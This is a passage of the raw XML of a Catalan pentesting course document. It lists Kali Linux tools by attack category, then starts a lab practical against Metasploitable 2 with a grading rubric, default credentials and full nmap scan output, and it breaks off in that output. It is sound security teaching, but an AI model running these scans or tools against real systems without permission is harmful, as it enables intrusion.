        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Live USB</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Execució sense instal·lar, amb mode persistent opcional</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Imatges VM (VMware/VirtualBox)</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Ja preconfigurades</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">WSL (Windows Subsystem for Linux)</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Kali dins de Windows, sense VM</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Imatges ARM</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Raspberry Pi, Pinebook, etc.</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Kali NetHunter</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Versió per a mòbils Android (rootejats), amb HID attacks, wireless injection des del mòbil</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Kali Purple</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table1.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Variant orientada a <text:span text:style-name="T1">Blue Team / defensa</text:span> (SIEM, detecció, resposta a incidents) — complementària a la Kali “clàssica” ofensiva</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="metapaquets"/><text:bookmark-start text:name="__RefHeading___Toc1916_1837196447"/>1.5. Metapaquets<text:bookmark-end text:name="metapaquets"/><text:bookmark-end text:name="__RefHeading___Toc1916_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">En comptes d’instal·lar-ho tot (&gt;600 eines), es pot triar per metapaquets segons especialitat:</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> apt install kali-linux-headless <text:s text:c="5"/></text:span><text:span text:style-name="CommentTok"># sense entorn gràfic</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> apt install kali-tools-wireless <text:s text:c="5"/></text:span><text:span text:style-name="CommentTok"># eines wifi</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> apt install kali-tools-forensics <text:s text:c="4"/></text:span><text:span text:style-name="CommentTok"># forense digital</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> apt install kali-tools-web <text:s text:c="10"/></text:span><text:span text:style-name="CommentTok"># pentesting web</text:span> </text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">sudo</text:span><text:span text:style-name="NormalTok"> apt install kali-linux-everything <text:s text:c="3"/></text:span><text:span text:style-name="CommentTok"># tot (molt pesat)</text:span> </text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="entorn-descriptori"/><text:bookmark-start text:name="__RefHeading___Toc1918_1837196447"/>1.6. Entorn d’escriptori<text:bookmark-end text:name="entorn-descriptori"/><text:bookmark-end text:name="__RefHeading___Toc1918_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Per defecte porta <text:span text:style-name="T1">Xfce</text:span>, lleuger i pensat per a màquines virtuals amb pocs recursos, però és compatible amb GNOME, KDE i altres.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="eines"/><text:bookmark-start text:name="__RefHeading___Toc1920_1837196447"/><text:soft-page-break/>1.7. Eines<text:bookmark-end text:name="eines"/><text:bookmark-end text:name="__RefHeading___Toc1920_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Kali Linux és una distribució especialitzada en seguretat ofensiva i pentesting, amb centenars d’eines preinstal·lades.</text:p>
      <text:p text:style-name="P5">Reconeixement i escaneig de xarxes</text:p>
      <text:list text:style-name="L2">
        <text:list-item>
          <text:p text:style-name="P6"><text:span text:style-name="T1">Nmap</text:span> — l’escàner de xarxes per excel·lència, per descobrir hosts, ports i serveis</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P6"><text:span text:style-name="T1">Wireshark</text:span> — analitzador de protocols de xarxa (captura i inspecció de paquets)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P6"><text:span text:style-name="T1">Netdiscover</text:span> — descobriment d’hosts en xarxes locals</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Anàlisi de vulnerabilitats</text:p>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:p text:style-name="P8"><text:span text:style-name="T1">OpenVAS</text:span> — escàner de vulnerabilitats complet</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P8"><text:span text:style-name="T1">Nikto</text:span> — escàner de vulnerabilitats web</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Explotació</text:p>
      <text:list text:style-name="L4">
        <text:list-item>
          <text:p text:style-name="P9"><text:span text:style-name="T1">Metasploit Framework</text:span> — el framework d’explotació més utilitzat, amb centenars de mòduls</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P9"><text:span text:style-name="T1">BeEF (Browser Exploitation Framework)</text:span> — explotació orientada a navegadors</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P9"><text:span text:style-name="T1">SQLmap</text:span> — automatitza la detecció i explotació d’injeccions SQL</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Atacs a xarxes sense fils</text:p>
      <text:list text:style-name="L5">
        <text:list-item>
          <text:p text:style-name="P10"><text:span text:style-name="T1">Aircrack-ng</text:span> — suite completa per auditar seguretat WiFi (captura, desautenticació, crackeig WEP/WPA)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P10"><text:span text:style-name="T1">Kismet</text:span> — detector de xarxes sense fils i sniffer</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Crackeig de contrasenyes</text:p>
      <text:list text:style-name="L6">
        <text:list-item>
          <text:p text:style-name="P11"><text:span text:style-name="T1">John the Ripper</text:span> — crackeig de contrasenyes offline</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P11"><text:span text:style-name="T1">Hashcat</text:span> — crackeig de hashes accelerat per GPU, molt potent</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P11"><text:span text:style-name="T1">Hydra</text:span> — atacs de força bruta contra serveis (SSH, FTP, HTTP…)</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Aplicacions web</text:p>
      <text:list text:style-name="L7">
        <text:list-item>
          <text:p text:style-name="P12"><text:span text:style-name="T1">Burp Suite</text:span> — proxy intercepció per auditar aplicacions web (versió Community inclosa)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P12"><text:span text:style-name="T1">OWASP ZAP</text:span> — alternativa lliure a Burp per testing web</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Forense digital</text:p>
      <text:list text:style-name="L8">
        <text:list-item>
          <text:p text:style-name="P13"><text:span text:style-name="T1">Autopsy</text:span> — plataforma d’anàlisi forense</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P13"><text:span text:style-name="T1">Binwalk</text:span> — anàlisi d’imatges de firmware</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7">Enginyeria social</text:p>
      <text:list text:style-name="L9">
        <text:list-item>
          <text:p text:style-name="P14"><text:span text:style-name="T1">SET (Social Engineering Toolkit)</text:span> — automatitza atacs d’enginyeria social (phishing, clonació de webs, etc.)</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P7"><text:soft-page-break/>Postexplotació i sniffing</text:p>
      <text:list text:style-name="L10">
        <text:list-item>
          <text:p text:style-name="P15"><text:span text:style-name="T1">Ettercap</text:span> — atacs MITM (man-in-the-middle)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P15"><text:span text:style-name="T1">Responder</text:span> — captura de credencials en xarxes Windows (LLMNR/NBT-NS poisoning)</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_1" text:outline-level="1"><text:bookmark-start text:name="pràctica-introducció-al-pentesting-amb-kali-linux"/><text:bookmark-start text:name="__RefHeading___Toc1922_1837196447"/>2. Pràctica: Introducció al Pentesting amb Kali Linux<text:bookmark-end text:name="pràctica-introducció-al-pentesting-amb-kali-linux"/><text:bookmark-end text:name="__RefHeading___Toc1922_1837196447"/></text:h>
      <text:p text:style-name="AlertAvisEtiqueta">⚠️ AVíS</text:p>
      <text:p text:style-name="AlertAvis">Aquestes eines i tècniques només s’han d’utilitzar en entorns de laboratori controlats i propis. L’ús contra sistemes de tercers sense autorització explícita és <text:span text:style-name="T1">il·legal</text:span>. L’ús ètic i legal (només en entorns propis o amb autorització explícita) és el que en marca la diferència respecte a l’ús maliciós.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="descripció"/><text:bookmark-start text:name="__RefHeading___Toc1924_1837196447"/>2.1. Descripció<text:bookmark-end text:name="descripció"/><text:bookmark-end text:name="__RefHeading___Toc1924_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph">Aquesta pràctica introdueix a la metodologia bàsica d’un test d’intrusió (pentesting) mitjançant un laboratori controlat amb dues màquines virtuals: un atacant (<text:span text:style-name="T1">Kali Linux</text:span>) i una víctima intencionadament vulnerable (<text:span text:style-name="T1">Metasploitable 2</text:span>). L’objectiu és seguir el cicle clàssic: reconeixement → escaneig → explotació → postexplotació → informe.</text:p>
      <text:p text:style-name="AlertAvisEtiqueta">⚠️ AVíS</text:p>
      <text:p text:style-name="AlertAvis">Metasploitable 2 és una màquina virtual basada en Linux que conté diverses vulnerabilitats intencionades perquè les explotis. Metasploitable és essencialment un laboratori de proves de penetració en una capsa, disponible com a màquina virtual de VMware (VMX). No li donis mai una interfície amb sortida a Internet ni al segment de producció: només xarxa interna/host-only amb Kali.</text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="objectius-daprenentatge"/><text:bookmark-start text:name="__RefHeading___Toc1926_1837196447"/>2.2. Objectius d’aprenentatge<text:bookmark-end text:name="objectius-daprenentatge"/><text:bookmark-end text:name="__RefHeading___Toc1926_1837196447"/></text:h>
      <text:list text:style-name="L11">
        <text:list-item>
          <text:p text:style-name="P16">Comprendre les fases d’un test d’intrusió</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16">Utilitzar Nmap per a l’escaneig i fingerprinting de serveis</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16">Identificar vulnerabilitats conegudes en serveis desactualitzats</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16">Explotar una vulnerabilitat amb Metasploit Framework</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16">Practicar crackeig de contrasenyes amb John the Ripper / Hydra</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P16">Redactar un informe de resultats bàsic</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="rúbrica-davaluació"/><text:bookmark-start text:name="__RefHeading___Toc1928_1837196447"/><text:soft-page-break/>2.3. Rúbrica d’avaluació<text:bookmark-end text:name="rúbrica-davaluació"/><text:bookmark-end text:name="__RefHeading___Toc1928_1837196447"/></text:h>
      <table:table table:name="Table2" table:style-name="Table2">
        <table:table-column table:style-name="Table2.A"/>
        <table:table-column table:style-name="Table2.B"/>
        <table:table-column table:style-name="Table2.C"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table2.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Criteri</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table2.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Pes</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table2.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Descripció</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Escaneig i reconeixement</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">20%</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Ús correcte de Nmap, identificació de serveis</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Identificació de vulnerabilitats</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">20%</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Relació correcta servei-vulnerabilitat</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Explotació</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">30%</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Explotació reeixida documentada pas a pas</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Crackeig de credencials</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">15%</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Ús correcte de John/Hydra</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Informe final</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">15%</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table2.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Claredat, estructura, recomanacions de mitigació</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="possibles-ampliacions"/><text:bookmark-start text:name="__RefHeading___Toc1930_1837196447"/>2.4. Possibles ampliacions<text:bookmark-end text:name="possibles-ampliacions"/><text:bookmark-end text:name="__RefHeading___Toc1930_1837196447"/></text:h>
      <text:list text:style-name="L12">
        <text:list-item>
          <text:p text:style-name="P17">Afegir un tercer node amb <text:span text:style-name="T1">Wazuh</text:span> per detectar els atacs en temps real des del punt de vista defensiu (Blue Team)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P17">Repetir la pràctica contra una màquina <text:span text:style-name="T1">DVWA</text:span> per centrar-se en vulnerabilitats web (SQLi, XSS)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P17">Introduir <text:span text:style-name="T1">Wireshark</text:span> per capturar i analitzar el trànsit generat durant l’atac</text:p>
        </text:list-item>
      </text:list>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="arquitectura-del-laboratori"/><text:bookmark-start text:name="__RefHeading___Toc1932_1837196447"/>2.5. Arquitectura del laboratori<text:bookmark-end text:name="arquitectura-del-laboratori"/><text:bookmark-end text:name="__RefHeading___Toc1932_1837196447"/></text:h>
      <table:table table:name="Table3" table:style-name="Table3">
        <table:table-column table:style-name="Table3.A"/>
        <table:table-column table:style-name="Table3.B"/>
        <table:table-column table:style-name="Table3.A"/>
        <table:table-column table:style-name="Table3.D"/>
        <table:table-header-rows>
          <table:table-row>
            <table:table-cell table:style-name="Table3.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Màquina</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table3.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">Rol</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table3.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">IP (exemple)</text:p>
            </table:table-cell>
            <table:table-cell table:style-name="Table3.A1" office:value-type="string">
              <text:p text:style-name="Table_20_Heading">SO</text:p>
            </table:table-cell>
          </table:table-row>
        </table:table-header-rows>
        <table:table-row>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">kali.thos.local</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Atacant</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">192.168.100.10</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Kali Linux (rolling)</text:p>
          </table:table-cell>
        </table:table-row>
        <table:table-row>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents"><text:span text:style-name="CodiInline">metasploitable.thos.local</text:span></text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Víctima</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">192.168.100.20</text:p>
          </table:table-cell>
          <table:table-cell table:style-name="Table3.A1" office:value-type="string">
            <text:p text:style-name="Table_20_Contents">Metasploitable 2 (Ubuntu 8.04)</text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:p text:style-name="First_20_paragraph">Ambdues màquines han d’estar en una <text:span text:style-name="T1">xarxa interna aïllada</text:span> (host-only o vswitch propi), sense sortida a Internet ni al segment de producció.</text:p>
      <text:p text:style-name="FigureWithCaption"><text:soft-page-break/><draw:frame draw:style-name="fr1" draw:name="img2" text:anchor-type="as-char" svg:width="17cm" svg:height="9.229cm" draw:z-index="45"><draw:image xlink:href="Pictures/1000000100000AF0000005F0AE369163.png" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad" draw:mime-type="image/png"/></draw:frame></text:p>
      <text:p text:style-name="FigureCaption"><text:bookmark-start text:name="__RefHeading___Toc1978_1837196447"/>Figura 2: Arquitectura del laboratori de pentesting<text:bookmark-end text:name="__RefHeading___Toc1978_1837196447"/></text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="descàrrega-de-les-màquines"/><text:bookmark-start text:name="__RefHeading___Toc1934_1837196447"/>2.6. Descàrrega de les màquines<text:bookmark-end text:name="descàrrega-de-les-màquines"/><text:bookmark-end text:name="__RefHeading___Toc1934_1837196447"/></text:h>
      <text:list text:style-name="L13">
        <text:list-item>
          <text:p text:style-name="P18">Kali Linux: <text:a xlink:type="simple" xlink:href="https://www.kali.org/get-kali/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">https://www.kali.org/get-kali/</text:span></text:a></text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P18">Metasploitable 2: <text:a xlink:type="simple" xlink:href="https://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><text:span text:style-name="Definition">https://downloads.metasploit.com/data/metasploitable/metasploitable-linux-2.0.0.zip</text:span></text:a></text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="First_20_paragraph">Les credencials d’accés per a Metasploitable 2 són: <text:span text:style-name="CodiInline">msfadmin</text:span>:<text:span text:style-name="CodiInline">msfadmin</text:span></text:p>
      <text:h text:style-name="Heading_20_2" text:outline-level="2"><text:bookmark-start text:name="fase-1-reconeixement-i-escaneig-nmap"/><text:bookmark-start text:name="__RefHeading___Toc1936_1837196447"/>2.7. Fase 1 — Reconeixement i escaneig (Nmap)<text:bookmark-end text:name="fase-1-reconeixement-i-escaneig-nmap"/><text:bookmark-end text:name="__RefHeading___Toc1936_1837196447"/></text:h>
      <text:p text:style-name="First_20_paragraph"><text:span text:style-name="T1">Tasca:</text:span> Des de Kali, escaneja la màquina víctima. Identifica almenys 5 serveis oberts i les seves versions (per exemple, vsftpd 2.3.4, distccd, Samba, etc.)</text:p>
      <text:p text:style-name="Preformatted_20_Text"><text:span text:style-name="FunctionTok">nmap</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">-sV</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">-sC</text:span><text:span text:style-name="NormalTok"> </text:span><text:span text:style-name="AttributeTok">-p-</text:span><text:span text:style-name="NormalTok"> 192.168.100.20</text:span> </text:p>
      <text:list text:style-name="L14">
        <text:list-item>
          <text:p text:style-name="P19"><text:span text:style-name="CodiInline">-sV</text:span> → detecció de versions de servei</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P19"><text:span text:style-name="CodiInline">-sC</text:span> → scripts per defecte (NSE)</text:p>
        </text:list-item>
        <text:list-item>
          <text:p text:style-name="P19"><text:span text:style-name="CodiInline">-p-</text:span> → tots els 65535 ports</text:p>
        </text:list-item>
      </text:list>
      <text:p text:style-name="First_20_paragraph">Sortida de l’ordre:</text:p>
      <text:p text:style-name="Codi_20_Ini">┌──(ramon㉿kali)-[~]</text:p>
      <text:p text:style-name="Codi_20_Ini">└─$ nmap -sV -sC -p- 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">Starting Nmap 7.99 ( https://nmap.org ) at 2026-08-07 11:44 +0200</text:p>
      <text:p text:style-name="Codi_20_Ini">Nmap scan report for 192.168.100.20</text:p>
      <text:p text:style-name="Codi_20_Ini">Host is up (0.000049s latency).</text:p>
      <text:p text:style-name="Codi_20_Ini">Not shown: 65505 closed tcp ports (reset)</text:p>
      <text:p text:style-name="Codi_20_Ini"><text:soft-page-break/>PORT <text:s text:c="5"/>STATE SERVICE <text:s text:c="4"/>VERSION</text:p>
      <text:p text:style-name="Codi_20_Ini">21/tcp <text:s text:c="3"/>open <text:s/>ftp <text:s text:c="8"/>vsftpd 2.3.4</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ftp-anon: Anonymous FTP login allowed (FTP code 230)</text:p>
      <text:p text:style-name="Codi_20_Ini">| ftp-syst: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>STAT: </text:p>
      <text:p text:style-name="Codi_20_Ini">| FTP server status:</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>Connected to 192.168.100.10</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>Logged in as ftp</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>TYPE: ASCII</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>No session bandwidth limit</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>Session timeout in seconds is 300</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>Control connection is plain text</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>Data connections will be plain text</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="5"/>vsFTPd 2.3.4 - secure, fast, stable</text:p>
      <text:p text:style-name="Codi_20_Ini">|_End of status</text:p>
      <text:p text:style-name="Codi_20_Ini">22/tcp <text:s text:c="3"/>open <text:s/>ssh <text:s text:c="8"/>OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)</text:p>
      <text:p text:style-name="Codi_20_Ini">| ssh-hostkey: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s/>2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)</text:p>
      <text:p text:style-name="Codi_20_Ini">23/tcp <text:s text:c="3"/>open <text:s/>telnet <text:s text:c="5"/>Linux telnetd</text:p>
      <text:p text:style-name="Codi_20_Ini">25/tcp <text:s text:c="3"/>open <text:s/>smtp <text:s text:c="7"/>Postfix smtpd</text:p>
      <text:p text:style-name="Codi_20_Ini">| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</text:p>
      <text:p text:style-name="Codi_20_Ini">| Not valid before: 2010-03-17T14:07:45</text:p>
      <text:p text:style-name="Codi_20_Ini">|_Not valid after: <text:s/>2010-04-16T14:07:45</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ssl-date: 2026-08-07T09:47:05+00:00; -1s from scanner time.</text:p>
      <text:p text:style-name="Codi_20_Ini">|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN</text:p>
      <text:p text:style-name="Codi_20_Ini">| sslv2: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>SSLv2 supported</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>ciphers: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="4"/>SSL2_RC4_128_EXPORT40_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="4"/>SSL2_RC2_128_CBC_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="4"/>SSL2_DES_192_EDE3_CBC_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="4"/>SSL2_RC4_128_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="4"/>SSL2_DES_64_CBC_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s text:c="3"/>SSL2_RC2_128_CBC_EXPORT40_WITH_MD5</text:p>
      <text:p text:style-name="Codi_20_Ini">53/tcp <text:s text:c="3"/>open <text:s/>domain <text:s text:c="5"/>ISC BIND 9.4.2</text:p>
      <text:p text:style-name="Codi_20_Ini">| dns-nsid: </text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s/>bind.version: 9.4.2</text:p>
      <text:p text:style-name="Codi_20_Ini">80/tcp <text:s text:c="3"/>open <text:s/>http <text:s text:c="7"/>Apache httpd 2.2.8 ((Ubuntu) DAV/2)</text:p>
      <text:p text:style-name="Codi_20_Ini">|_http-title: Metasploitable2 - Linux</text:p>
      <text:p text:style-name="Codi_20_Ini">|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2</text:p>
      <text:p text:style-name="Codi_20_Ini">111/tcp <text:s text:c="2"/>open <text:s/>rpcbind <text:s text:c="4"/>2 (RPC #100000)</text:p>
      <text:p text:style-name="Codi_20_Ini">| rpcinfo: </text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>program version <text:s text:c="3"/>port/proto <text:s/>service</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>100003 <text:s/>2,3,4 <text:s text:c="6"/>2049/tcp <text:s text:c="2"/>nfs</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>100003 <text:s/>2,3,4 <text:s text:c="6"/>2049/udp <text:s text:c="2"/>nfs</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>100005 <text:s/>1,2,3 <text:s text:c="5"/>48454/tcp <text:s text:c="2"/>mountd</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>100005 <text:s/>1,2,3 <text:s text:c="5"/>57191/udp <text:s text:c="2"/>mountd</text:p>
      <text:p text:style-name="Codi_20_Ini">| <text:s text:c="2"/>100021 <text:s/>1,3,4 <text:s text:c="5"/>37115/udp <text:s text:c="2"/>nlockmgr</text:p>
      <text:p text:style-name="Codi_20_Ini">|_ <text:s/>100021 <text:s/>1,3,4 <text:s text:c="5"/>44105/tcp <text:s text:c="2"/>nlockmgr</text:p>
